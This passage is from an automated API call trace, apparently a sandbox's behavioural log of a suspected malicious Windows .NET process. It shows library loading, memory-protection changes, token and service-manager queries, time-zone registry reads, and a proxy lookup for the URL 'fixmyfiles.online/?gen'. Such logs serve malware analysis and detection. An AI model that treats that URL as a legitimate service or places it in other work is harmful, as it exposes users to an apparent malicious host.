OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.961] GetCurrentProcess () returned 0xffffffff [0111.961] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x7771182c, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.962] GetCurrentProcess () returned 0xffffffff [0111.962] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x7771182c, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.962] GetCurrentProcess () returned 0xffffffff [0111.962] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711860, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x4, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x20) returned 0x0 [0111.962] GetCurrentProcess () returned 0xffffffff [0111.962] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee6fc*=0x77711860, NumberOfBytesToProtect=0x6ee700, NewAccessProtection=0x20, OldAccessProtection=0x6ee734 | out: BaseAddress=0x6ee6fc*=0x77711000, NumberOfBytesToProtect=0x6ee700, OldAccessProtection=0x6ee734*=0x4) returned 0x0 [0111.963] GetProcAddress (hModule=0x77710000, lpProcName="OpenThreadToken") returned 0x7772432c [0111.964] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpSetTimeouts") returned 0x7461d143 [0111.964] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpSetTimeoutsW") returned 0x0 [0111.964] WinHttpSetTimeouts (hInternet=0xb5ec48, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0111.965] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7462257e [0111.965] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x6ee9dc | out: pProxyConfig=0x6ee9dc) returned 1 [0111.965] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=12, lpWideCharStr=0x6ed7d0, cchWideChar=2047 | out: lpWideCharStr="IPHLPAPI.DLLᮤȬADVAPI32.dll") returned 12 [0111.966] SysReAllocStringLen (in: pbstr=0x6ee7d4*=0x0, psz="IPHLPAPI.DLL", len=0xc | out: pbstr=0x6ee7d4*="IPHLPAPI.DLL") returned 1 [0111.966] CharLowerBuffW (in: lpsz="IPHLPAPI.DLL", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0111.966] LoadLibraryExA (lpLibFileName="IPHLPAPI.DLL", hFile=0x0, dwFlags=0x0) returned 0x74590000 [0112.357] GetLastError () returned 0x0 [0112.357] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7c0*=0x74591140, NumberOfBytesToProtect=0x6ee7c4, NewAccessProtection=0x4, OldAccessProtection=0x6ee7f8 | out: BaseAddress=0x6ee7c0*=0x74591000, NumberOfBytesToProtect=0x6ee7c4, OldAccessProtection=0x6ee7f8*=0x20) returned 0x0 [0112.357] GetCurrentProcess () returned 0xffffffff [0112.357] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7c0*=0x74591140, NumberOfBytesToProtect=0x6ee7c4, NewAccessProtection=0x20, OldAccessProtection=0x6ee7f8 | out: BaseAddress=0x6ee7c0*=0x74591000, NumberOfBytesToProtect=0x6ee7c4, OldAccessProtection=0x6ee7f8*=0x4) returned 0x0 [0112.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7c0*=0x745911bc, NumberOfBytesToProtect=0x6ee7c4, NewAccessProtection=0x4, OldAccessProtection=0x6ee7f8 | out: BaseAddress=0x6ee7c0*=0x74591000, NumberOfBytesToProtect=0x6ee7c4, OldAccessProtection=0x6ee7f8*=0x20) returned 0x0 [0112.358] GetCurrentProcess () returned 0xffffffff [0112.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7c0*=0x745911bc, NumberOfBytesToProtect=0x6ee7c4, NewAccessProtection=0x20, OldAccessProtection=0x6ee7f8 | out: BaseAddress=0x6ee7c0*=0x74591000, NumberOfBytesToProtect=0x6ee7c4, OldAccessProtection=0x6ee7f8*=0x4) returned 0x0 [0112.358] GetCurrentProcess () returned 0xffffffff [0112.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7c0*=0x745911c8, NumberOfBytesToProtect=0x6ee7c4, NewAccessProtection=0x4, OldAccessProtection=0x6ee7f8 | out: BaseAddress=0x6ee7c0*=0x74591000, NumberOfBytesToProtect=0x6ee7c4, OldAccessProtection=0x6ee7f8*=0x20) returned 0x0 [0112.358] GetCurrentProcess () returned 0xffffffff [0112.358] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7c0*=0x745911c8, NumberOfBytesToProtect=0x6ee7c4, NewAccessProtection=0x20, OldAccessProtection=0x6ee7f8 | out: BaseAddress=0x6ee7c0*=0x74591000, NumberOfBytesToProtect=0x6ee7c4, OldAccessProtection=0x6ee7f8*=0x4) returned 0x0 [0112.359] GetProcAddress (hModule=0x74590000, lpProcName="GetAdaptersAddresses") returned 0x74596a4d [0112.787] GetProcAddress (hModule=0x74590000, lpProcName="GetBestInterfaceEx") returned 0x74593f41 [0112.787] GetProcAddress (hModule=0x772f0000, lpProcName="SHGetValueA") returned 0x772fcf09 [0112.788] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=9, lpWideCharStr=0x6ed578, cchWideChar=2047 | out: lpWideCharStr="ntdll.dll") returned 9 [0112.788] SysReAllocStringLen (in: pbstr=0x6ee57c*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x6ee57c*="ntdll.dll") returned 1 [0112.788] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0112.788] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77c40000 [0112.788] GetLastError () returned 0x0 [0112.789] GetProcAddress (hModule=0x77c40000, lpProcName="RtlConvertSidToUnicodeString") returned 0x77c7aec2 [0112.789] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0112.789] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0112.789] GetCurrentThreadId () returned 0xb0c [0112.789] ResetEvent (hEvent=0xb8) returned 1 [0112.789] GetCurrentThreadId () returned 0xb0c [0112.789] GetCurrentThreadId () returned 0xb0c [0112.789] GetCurrentThreadId () returned 0xb0c [0112.789] GetCurrentThreadId () returned 0xb0c [0112.789] ResetEvent (hEvent=0xb8) returned 1 [0112.789] GetCurrentThreadId () returned 0xb0c [0112.789] GetCurrentThreadId () returned 0xb0c [0112.789] SetEvent (hEvent=0xbc) returned 1 [0112.789] SetEvent (hEvent=0xb8) returned 1 [0112.789] CloseHandle (hObject=0x3fc) returned 1 [0112.790] FreeLibrary (hLibModule=0x77c40000) returned 1 [0113.115] GetCurrentThreadId () returned 0xb0c [0113.115] ResetEvent (hEvent=0xb8) returned 1 [0113.115] GetCurrentThreadId () returned 0xb0c [0113.115] GetCurrentThreadId () returned 0xb0c [0113.115] GetCurrentThreadId () returned 0xb0c [0113.115] GetCurrentThreadId () returned 0xb0c [0113.115] ResetEvent (hEvent=0xb8) returned 1 [0113.115] GetCurrentThreadId () returned 0xb0c [0113.115] GetCurrentThreadId () returned 0xb0c [0113.115] SetEvent (hEvent=0xbc) returned 1 [0113.116] SetEvent (hEvent=0xb8) returned 1 [0113.116] CloseHandle (hObject=0x408) returned 1 [0113.122] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariable") returned 0x0 [0113.125] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableW") returned 0x76d41b48 [0113.125] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x6ee1f8, nSize=0xac | out: lpBuffer="朩璡礐猂礐猂ꛠ猃n닄璩닗璩뫄艙礐猂") returned 0x0 [0113.125] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x6ee1f8, nSize=0xac | out: lpBuffer="朩璡礐猂礐猂ꛠ猃n닄璩닗璩뫄艙礐猂") returned 0x0 [0113.127] EtwEventRegister () returned 0x0 [0113.127] GetProcAddress (hModule=0x77710000, lpProcName="EventSetInformation") returned 0x0 [0113.146] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee6a8 | out: TokenHandle=0x6ee6a8*=0x3f4) returned 1 [0113.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee6b8 | out: TokenHandle=0x6ee6b8*=0x408) returned 1 [0113.158] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0113.158] SetEvent (hEvent=0x2e8) returned 1 [0113.179] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpGetProxyForUrl") returned 0x7461d5dc [0113.179] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpGetProxyForUrlW") returned 0x0 [0113.179] WinHttpGetProxyForUrl (in: hSession=0xb5ec48, lpcwszUrl="https://fixmyfiles.online/?gen", pAutoProxyOptions=0x6ee8ec, pProxyInfo=0x6ee95c | out: pProxyInfo=0x6ee95c) returned 0 [0113.186] GetProcAddress (hModule=0x76af0000, lpProcName="RpcAsyncInitializeHandle") returned 0x76ba020e [0113.186] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=40, lpWideCharStr=0x6ed5b0, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-Management-L1-1-0.dll") returned 40 [0113.187] SysReAllocStringLen (in: pbstr=0x6ee5b4*=0x0, psz="API-MS-WIN-Service-Management-L1-1-0.dll", len=0x28 | out: pbstr=0x6ee5b4*="API-MS-WIN-Service-Management-L1-1-0.dll") returned 1 [0113.187] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-Management-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-service-management-l1-1-0.dll") returned 0x28 [0113.187] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0113.187] GetLastError () returned 0x0 [0113.187] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5a0*=0x76d11074, NumberOfBytesToProtect=0x6ee5a4, NewAccessProtection=0x4, OldAccessProtection=0x6ee5d8 | out: BaseAddress=0x6ee5a0*=0x76d11000, NumberOfBytesToProtect=0x6ee5a4, OldAccessProtection=0x6ee5d8*=0x20) returned 0x0 [0113.188] GetCurrentProcess () returned 0xffffffff [0113.188] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5a0*=0x76d11074, NumberOfBytesToProtect=0x6ee5a4, NewAccessProtection=0x20, OldAccessProtection=0x6ee5d8 | out: BaseAddress=0x6ee5a0*=0x76d11000, NumberOfBytesToProtect=0x6ee5a4, OldAccessProtection=0x6ee5d8*=0x4) returned 0x0 [0113.188] GetCurrentProcess () returned 0xffffffff [0113.188] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5a0*=0x76d11088, NumberOfBytesToProtect=0x6ee5a4, NewAccessProtection=0x4, OldAccessProtection=0x6ee5d8 | out: BaseAddress=0x6ee5a0*=0x76d11000, NumberOfBytesToProtect=0x6ee5a4, OldAccessProtection=0x6ee5d8*=0x20) returned 0x0 [0113.188] GetCurrentProcess () returned 0xffffffff [0113.188] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5a0*=0x76d11088, NumberOfBytesToProtect=0x6ee5a4, NewAccessProtection=0x20, OldAccessProtection=0x6ee5d8 | out: BaseAddress=0x6ee5a0*=0x76d11000, NumberOfBytesToProtect=0x6ee5a4, OldAccessProtection=0x6ee5d8*=0x4) returned 0x0 [0113.189] GetProcAddress (hModule=0x76d10000, lpProcName="OpenSCManagerW") returned 0x76d163ad [0113.189] GetCurrentThreadId () returned 0xb0c [0113.189] ResetEvent (hEvent=0xb8) returned 1 [0113.189] GetCurrentThreadId () returned 0xb0c [0113.189] GetCurrentThreadId () returned 0xb0c [0113.189] GetCurrentThreadId () returned 0xb0c [0113.189] GetCurrentThreadId () returned 0xb0c [0113.189] ResetEvent (hEvent=0xb8) returned 1 [0113.189] GetCurrentThreadId () returned 0xb0c [0113.189] GetCurrentThreadId () returned 0xb0c [0113.189] SetEvent (hEvent=0xbc) returned 1 [0113.189] SetEvent (hEvent=0xb8) returned 1 [0113.189] CloseHandle (hObject=0x424) returned 1 [0113.190] GetProcAddress (hModule=0x76d10000, lpProcName="OpenServiceW") returned 0x76d1714b [0113.191] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0113.191] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=40, lpWideCharStr=0x6ed5c0, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-Management-L2-1-0.dll") returned 40 [0113.191] SysReAllocStringLen (in: pbstr=0x6ee5c4*=0x0, psz="API-MS-WIN-Service-Management-L2-1-0.dll", len=0x28 | out: pbstr=0x6ee5c4*="API-MS-WIN-Service-Management-L2-1-0.dll") returned 1 [0113.191] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-Management-L2-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-service-management-l2-1-0.dll") returned 0x28 [0113.191] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L2-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0113.191] GetLastError () returned 0x0 [0113.192] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b0*=0x76d11074, NumberOfBytesToProtect=0x6ee5b4, NewAccessProtection=0x4, OldAccessProtection=0x6ee5e8 | out: BaseAddress=0x6ee5b0*=0x76d11000, NumberOfBytesToProtect=0x6ee5b4, OldAccessProtection=0x6ee5e8*=0x20) returned 0x0 [0113.192] GetCurrentProcess () returned 0xffffffff [0113.192] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b0*=0x76d11074, NumberOfBytesToProtect=0x6ee5b4, NewAccessProtection=0x20, OldAccessProtection=0x6ee5e8 | out: BaseAddress=0x6ee5b0*=0x76d11000, NumberOfBytesToProtect=0x6ee5b4, OldAccessProtection=0x6ee5e8*=0x4) returned 0x0 [0113.192] GetCurrentProcess () returned 0xffffffff [0113.192] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b0*=0x76d11088, NumberOfBytesToProtect=0x6ee5b4, NewAccessProtection=0x4, OldAccessProtection=0x6ee5e8 | out: BaseAddress=0x6ee5b0*=0x76d11000, NumberOfBytesToProtect=0x6ee5b4, OldAccessProtection=0x6ee5e8*=0x20) returned 0x0 [0113.193] GetCurrentProcess () returned 0xffffffff [0113.193] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b0*=0x76d11088, NumberOfBytesToProtect=0x6ee5b4, NewAccessProtection=0x20, OldAccessProtection=0x6ee5e8 | out: BaseAddress=0x6ee5b0*=0x76d11000, NumberOfBytesToProtect=0x6ee5b4, OldAccessProtection=0x6ee5e8*=0x4) returned 0x0 [0113.193] GetProcAddress (hModule=0x76d10000, lpProcName="NotifyServiceStatusChangeW") returned 0x76d1a0ff [0113.194] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=36, lpWideCharStr=0x6ed5c4, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-winsvc-L1-1-0.dllll") returned 36 [0113.194] SysReAllocStringLen (in: pbstr=0x6ee5c8*=0x0, psz="API-MS-WIN-Service-winsvc-L1-1-0.dll", len=0x24 | out: pbstr=0x6ee5c8*="API-MS-WIN-Service-winsvc-L1-1-0.dll") returned 1 [0113.194] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-winsvc-L1-1-0.dll", cchLength=0x24 | out: lpsz="api-ms-win-service-winsvc-l1-1-0.dll") returned 0x24 [0113.194] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-winsvc-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0113.194] GetLastError () returned 0x0 [0113.194] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b4*=0x76d11074, NumberOfBytesToProtect=0x6ee5b8, NewAccessProtection=0x4, OldAccessProtection=0x6ee5ec | out: BaseAddress=0x6ee5b4*=0x76d11000, NumberOfBytesToProtect=0x6ee5b8, OldAccessProtection=0x6ee5ec*=0x20) returned 0x0 [0113.195] GetCurrentProcess () returned 0xffffffff [0113.195] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b4*=0x76d11074, NumberOfBytesToProtect=0x6ee5b8, NewAccessProtection=0x20, OldAccessProtection=0x6ee5ec | out: BaseAddress=0x6ee5b4*=0x76d11000, NumberOfBytesToProtect=0x6ee5b8, OldAccessProtection=0x6ee5ec*=0x4) returned 0x0 [0113.195] GetCurrentProcess () returned 0xffffffff [0113.195] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b4*=0x76d11088, NumberOfBytesToProtect=0x6ee5b8, NewAccessProtection=0x4, OldAccessProtection=0x6ee5ec | out: BaseAddress=0x6ee5b4*=0x76d11000, NumberOfBytesToProtect=0x6ee5b8, OldAccessProtection=0x6ee5ec*=0x20) returned 0x0 [0113.195] GetCurrentProcess () returned 0xffffffff [0113.195] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee5b4*=0x76d11088, NumberOfBytesToProtect=0x6ee5b8, NewAccessProtection=0x20, OldAccessProtection=0x6ee5ec | out: BaseAddress=0x6ee5b4*=0x76d11000, NumberOfBytesToProtect=0x6ee5b8, OldAccessProtection=0x6ee5ec*=0x4) returned 0x0 [0113.196] GetProcAddress (hModule=0x76d10000, lpProcName="QueryServiceStatus") returned 0x76d14e4b [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] ResetEvent (hEvent=0xb8) returned 1 [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] ResetEvent (hEvent=0xb8) returned 1 [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] SetEvent (hEvent=0xbc) returned 1 [0113.197] SetEvent (hEvent=0xb8) returned 1 [0113.197] CloseHandle (hObject=0x428) returned 1 [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] ResetEvent (hEvent=0xb8) returned 1 [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] ResetEvent (hEvent=0xb8) returned 1 [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] GetCurrentThreadId () returned 0xb0c [0113.197] SetEvent (hEvent=0xbc) returned 1 [0113.197] SetEvent (hEvent=0xb8) returned 1 [0113.197] CloseHandle (hObject=0x424) returned 1 [0113.198] GetProcAddress (hModule=0x76af0000, lpProcName="NdrAsyncClientCall") returned 0x76ba0aae [0115.942] GetProcAddress (hModule=0x76af0000, lpProcName="RpcAsyncCompleteCall") returned 0x76ba0d7c [0115.942] GetCurrentThreadId () returned 0xb0c [0115.942] ResetEvent (hEvent=0xb8) returned 1 [0115.942] GetCurrentThreadId () returned 0xb0c [0115.942] GetCurrentThreadId () returned 0xb0c [0115.942] GetCurrentThreadId () returned 0xb0c [0115.942] GetCurrentThreadId () returned 0xb0c [0115.942] ResetEvent (hEvent=0xb8) returned 1 [0115.942] GetCurrentThreadId () returned 0xb0c [0115.942] GetCurrentThreadId () returned 0xb0c [0115.942] SetEvent (hEvent=0xbc) returned 1 [0115.942] SetEvent (hEvent=0xb8) returned 1 [0115.942] CloseHandle (hObject=0x420) returned 1 [0115.945] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee600 | out: TokenHandle=0x6ee600*=0x420) returned 1 [0115.946] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6ee610 | out: TokenHandle=0x6ee610*=0x428) returned 1 [0115.950] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0115.950] GetTimeZoneInformation (in: lpTimeZoneInformation=0x6ee810 | out: lpTimeZoneInformation=0x6ee810) returned 0x1 [0115.961] GetProcAddress (hModule=0x76d30000, lpProcName="GetDynamicTimeZoneInformation") returned 0x76dc460f [0115.961] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x6ee664 | out: pTimeZoneInformation=0x6ee664) returned 0x1 [0115.962] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ee748 | out: phkResult=0x6ee748*=0x42c) returned 0x0 [0115.962] RegQueryValueExW (in: hKey=0x42c, lpValueName="TZI", lpReserved=0x0, lpType=0x6ee764, lpData=0x0, lpcbData=0x6ee760*=0x0 | out: lpType=0x6ee764*=0x3, lpData=0x0, lpcbData=0x6ee760*=0x2c) returned 0x0 [0115.963] RegQueryValueExW (in: hKey=0x42c, lpValueName="TZI", lpReserved=0x0, lpType=0x6ee764, lpData=0x387b4e8, lpcbData=0x6ee760*=0x2c | out: lpType=0x6ee764*=0x3, lpData=0x387b4e8*, lpcbData=0x6ee760*=0x2c) returned 0x0 [0115.963] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x6ee59c | out: phkResult=0x6ee59c*=0x430) returned 0x0 [0115.963] RegQueryValueExW (in: hKey=0x430, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x0, lpcbData=0x6ee5b4*=0x0 | out: lpType=0x6ee5b8*=0x4, lpData=0x0, lpcbData=0x6ee5b4*=0x4) returned 0x0 [0115.964] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueEx") returned 0x0 [0115.964] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0115.964] RegQueryValueExW (in: hKey=0x430, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x6ee5a4, lpcbData=0x6ee5b4*=0x4 | out: lpType=0x6ee5b8*=0x4, lpData=0x6ee5a4*=0x7d7, lpcbData=0x6ee5b4*=0x4) returned 0x0 [0115.964] RegQueryValueExW (in: hKey=0x430, lpValueName="LastEntry", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x0, lpcbData=0x6ee5b4*=0x0 | out: lpType=0x6ee5b8*=0x4, lpData=0x0, lpcbData=0x6ee5b4*=0x4) returned 0x0 [0115.964] RegQueryValueExW (in: hKey=0x430, lpValueName="LastEntry", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x6ee5a4, lpcbData=0x6ee5b4*=0x4 | out: lpType=0x6ee5b8*=0x4, lpData=0x6ee5a4*=0x7d8, lpcbData=0x6ee5b4*=0x4) returned 0x0 [0115.964] RegQueryValueExW (in: hKey=0x430, lpValueName="2007", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x0, lpcbData=0x6ee5b4*=0x0 | out: lpType=0x6ee5b8*=0x3, lpData=0x0, lpcbData=0x6ee5b4*=0x2c) returned 0x0 [0115.964] RegQueryValueExW (in: hKey=0x430, lpValueName="2007", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x387b97c, lpcbData=0x6ee5b4*=0x2c | out: lpType=0x6ee5b8*=0x3, lpData=0x387b97c*, lpcbData=0x6ee5b4*=0x2c) returned 0x0 [0115.964] RegQueryValueExW (in: hKey=0x430, lpValueName="2008", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x0, lpcbData=0x6ee5b4*=0x0 | out: lpType=0x6ee5b8*=0x3, lpData=0x0, lpcbData=0x6ee5b4*=0x2c) returned 0x0 [0115.964] RegQueryValueExW (in: hKey=0x430, lpValueName="2008", lpReserved=0x0, lpType=0x6ee5b8, lpData=0x387ba3c, lpcbData=0x6ee5b4*=0x2c | out: lpType=0x6ee5b8*=0x3, lpData=0x387ba3c*, lpcbData=0x6ee5b4*=0x2c) returned 0x0 [0115.964] RegCloseKey (hKey=0x430) returned 0x0 [0115.965] RegQueryValueExW (in: hKey=0x42c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x6ee73c, lpData=0x0, lpcbData=0x6ee738*=0x0 | out: lpType=0x6ee73c*=0x1, lpData=0x0, lpcbData=0x6ee738*=0x20) returned 0x0 [0115.965] RegQueryValueExW (in: hKey=0x42c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x6ee73c, lpData=0x387bb84, lpcbData=0x6ee738*=0x20 | out: lpType=0x6ee73c*=0x1, lpData="@tzres.dll,-670", lpcbData=0x6ee738*=0x20) returned 0x0 [0115.965] RegQueryValueExW (in: hKey=0x42c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x6ee73c, lpData=0x0, lpcbData=0x6ee738*=0x0 | out: lpType=0x6ee73c*=0x1, lpData=0x0, lpcbData=0x6ee738*=0x20) returned 0x0 [0115.965] RegQueryValueExW (in: hKey=0x42c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x6ee73c, lpData=0x387bbdc, lpcbData=0x6ee738*=0x20 | out: lpType=0x6ee73c*=0x1, lpData="@tzres.dll,-672", lpcbData=0x6ee738*=0x20) returned 0x0 [0115.965] RegQueryValueExW (in: hKey=0x42c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x6ee73c, lpData=0x0, lpcbData=0x6ee738*=0x0 | out: lpType=0x6ee73c*=0x1, lpData=0x0, lpcbData=0x6ee738*=0x20) returned 0x0 [0115.965] RegQueryValueExW (in: hKey=0x42c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x6ee73c, lpData=0x387bc34, lpcbData=0x6ee738*=0x20 | out: lpType=0x6ee73c*=0x1, lpData="@tzres.dll,-671", lpcbData=0x6ee738*=0x20) returned 0x0 [0115.967] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0115.967] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbc5c10 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0115.967] CoTaskMemFree (pv=0xbc5c10) [0115.969] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileMUIPath") returned 0x76dc4731 [0115.969] CoTaskMemAlloc (cb=0x20c) returned 0xbc5c10 [0115.969] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x6ee758, pwszFileMUIPath=0xbc5c10, pcchFileMUIPath=0x6ee75c, pululEnumerator=0x6ee750 | out: pwszLanguage=0x0, pcchLanguage=0x6ee758, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x6ee75c, pululEnumerator=0x6ee750) returned 1 [0115.973] CoTaskMemFree (pv=0x0) [0115.973] CoTaskMemFree (pv=0xbc5c10) [0115.976] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryEx") returned 0x0 [0115.978] SysReAllocStringLen (in: pbstr=0x6ee678*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x6ee678*="tzres.dll.mui") returned 1 [0115.978] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0115.978] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2100001 [0115.981] GetLastError () returned 0x0 [0115.982] SysReAllocStringLen (in: pbstr=0x6edaa8*=0x0, psz="user32.dll", len=0xa | out: pbstr=0x6edaa8*="user32.dll") returned 1 [0115.982] CharLowerBuffW (in: lpsz="user32.dll", cchLength=0xa | out: lpsz="user32.dll") returned 0xa [0115.982] LoadLibraryExW (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x77130000 [0115.982] GetLastError () returned 0x0 [0115.983] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eda90*=0x7714035c, NumberOfBytesToProtect=0x6eda94, NewAccessProtection=0x4, OldAccessProtection=0x6edac8 